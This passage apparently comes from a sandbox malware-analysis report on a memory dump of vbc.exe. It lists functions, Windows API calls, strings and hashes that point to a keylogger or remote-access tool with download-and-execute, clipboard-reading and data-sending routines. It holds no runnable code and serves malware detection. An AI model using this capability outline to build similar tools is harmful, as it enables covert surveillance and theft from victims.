sJD, xrefs: 00451DD1, 00451E19, 00451EC1

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: sJD
API String ID: 4212172061-3536923933
Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

override, xrefs: 0040F7CC
5.0.0 Pro, xrefs: 0040F836, 0040F8A3
pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.0.0 Pro$override$pth_unenc
API String ID: 2281282204-3992771774
Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

], xrefs: 0040B180
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B
Offline Keylogger Started, xrefs: 0040B16B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 00407007, 0040712F
open, xrefs: 00406FB6

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$open
API String ID: 2825088817-757541357
Opcode ID: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
Opcode Fuzzy Hash: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 0040793A
XPG, xrefs: 00407877

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5
Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0
TileWallpaper, xrefs: 0041CAC1

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 004461F2

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85

Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58

Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043BC1A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32(0000000D), ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B

Strings

, xrefs: 00434DD2

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94

Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044EA0C

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54

Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D

Strings

lJD, xrefs: 00451FA0

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44

Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082

Strings

lJD, xrefs: 0045203B

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604

Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940

Strings

GetLocaleInfoEx, xrefs: 00448908

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E

Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
HeapFree.KERNEL32(00000000), ref: 004120EE

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58

Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58

Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698

Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C

Memory Dump Source

Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09

Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
